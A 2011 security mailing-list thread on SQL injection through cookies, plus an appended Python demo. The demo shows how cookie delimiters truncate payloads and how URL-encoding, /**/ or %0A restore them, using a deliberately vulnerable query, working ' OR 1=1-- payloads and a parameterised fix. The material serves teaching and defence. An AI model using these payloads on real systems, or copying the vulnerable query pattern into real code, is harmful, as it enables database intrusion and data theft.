websecurity@lists.webappsec.org

The Web Security Mailing List

Re: [WEB SECURITY] SQL injection in cookies variable

OxFFFF 1336
Sun, Aug 28, 2011 10:42 PM

Thank you guys for the help!

@albino: Concerning the ";" and " ", I didn't know about this :) But it's very
logical.
@Anurag: Sure, the SQLi can just be in cookie variables when not sanitized.
@Sandro: The video is awesome. Thank you for the links.

Cheers

2011/8/28 albinowax@gmail.com

I have an example page vulnerable to cookie-based SQLi at
http://hackxor.sourceforge.net/cgi-bin/portal.pl (and a similar page
with a slightly different exploit using JSP in the download)

Predictable self-promotion aside, cookie-based SQLi is very similar to
get/post based SQLi, except that certain characters can't be used. For
example, ';' and ',' are typically treated as delimiters, so they end
the injection if they aren't URL-encoded. A lot of these rules are
server-specific though; Tomcat6/JSP treats whitespace as a delimiter
(which is easy to work around in mysql by using /**/ or %0A instead).

albino

On Sun, 28 Aug 2011 15:47 +0200, "OxFFFF 1336"
0x1336.9@gmail.com wrote:

Hey there,

I'm doing some research concerning SQL injection in cookie
variables and I want to know if there are previous papers or
materials related to this.

I'll be glad if you can help me with this :)

Many thanks in advance,

Cheers
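The delimiter behaviour albino describes above is easy to see in code. The following is an added example, not code from the thread or from hackxor: it uses a simplified cookie-header parser that splits pairs on ';' and ',' (and, in a "Tomcat-like" mode, on whitespace as well, per albino's remark, which is a simplification of what Tomcat actually does), an in-memory SQLite table with constructed rows, and a lookup that splices the session cookie straight into the query next to a parameterised version. A payload carrying a literal ',' or ' ' is cut short by the parser and produces a broken query, while the same payload URL-encoded, or with spaces replaced by /**/ or %0A, survives parsing and fires.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample data for the demo; not from the original thread.
USERS = [(1, "alice", "s3ss-alice"), (2, "bob", "s3ss-bob")]

# Payload with literal commas: ',' ends the cookie pair, so it is truncated.
RAW_COMMA = "session=x' OR name IN ('alice','bob')--; theme=dark"
# Same payload, URL-encoded: the parser sees no delimiters and decodes it intact.
ENCODED_COMMA = "session=x%27%20OR%20name%20IN%20%28%27alice%27%2C%27bob%27%29--; theme=dark"
# Payload with spaces, for a parser that (like Tomcat 6 per the thread) splits on whitespace.
RAW_SPACES = "session=x' OR 1=1--; theme=dark"
# Workarounds from the thread: comments or an encoded newline instead of spaces.
COMMENT_SPACES = "session=x'/**/OR/**/1=1--; theme=dark"
NEWLINE_SPACES = "session=x'%0AOR%0A1=1--; theme=dark"

TOMCAT_LIKE = ";, "  # simplified: ';', ',' and space all end a cookie pair


def parse_cookie_header(header, delimiters=";,"):
    """Simplified Cookie-header parser (assumption: real servers differ in detail).

    Each cookie pair ends at any character in `delimiters`; the value is then
    URL-decoded, so %2C survives as ',' but a literal ',' truncates the pair.
    Fragments without '=' (the tail of a truncated payload) are dropped.
    """
    cookies = {}
    for pair in re.split("[" + re.escape(delimiters) + "]", header):
        name, sep, value = pair.strip().partition("=")
        if not sep:
            continue
        cookies[name.strip()] = unquote(value.strip())
    return cookies


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, session TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, session):
    """The SQLi sink: the cookie value becomes part of the SQL text."""
    sql = "SELECT name FROM users WHERE session = '" + session + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, session):
    """Parameterised query: the cookie value is bound, never parsed as SQL."""
    rows = conn.execute("SELECT name FROM users WHERE session = ?", (session,))
    return [row[0] for row in rows]


def run_attack(header, delimiters=";,", safe=False):
    """Parse `header`, take the 'session' cookie and run the lookup with it.

    Returns the matched names, or 'syntax error' when the spliced SQL did not
    parse (what a truncated payload looks like from the attacker's side).
    """
    conn = setup_db()
    session = parse_cookie_header(header, delimiters).get("session", "")
    try:
        if safe:
            return lookup_safe(conn, session)
        return lookup_vulnerable(conn, session)
    except sqlite3.Error:
        return "syntax error"


def demo():
    """Run every scenario and return the outcomes keyed by name."""
    return {
        "raw_comma_payload": run_attack(RAW_COMMA),                    # 'syntax error'
        "encoded_comma_payload": run_attack(ENCODED_COMMA),            # ['alice', 'bob']
        "tomcat_spaces": run_attack(RAW_SPACES, TOMCAT_LIKE),          # 'syntax error'
        "tomcat_comments": run_attack(COMMENT_SPACES, TOMCAT_LIKE),    # ['alice', 'bob']
        "tomcat_newline": run_attack(NEWLINE_SPACES, TOMCAT_LIKE),     # ['alice', 'bob']
        "parameterised": run_attack(ENCODED_COMMA, safe=True),         # []
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:24s} -> {outcome}")
```

The point to take from the two failing cases is that the truncation is a property of the cookie parser, not of the database: the payload is intact on the wire, but the server hands the query only the part before the first delimiter. Encoding the delimiters, or avoiding them with /**/ and %0A, restores the injection, and only the parameterised lookup is actually immune.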
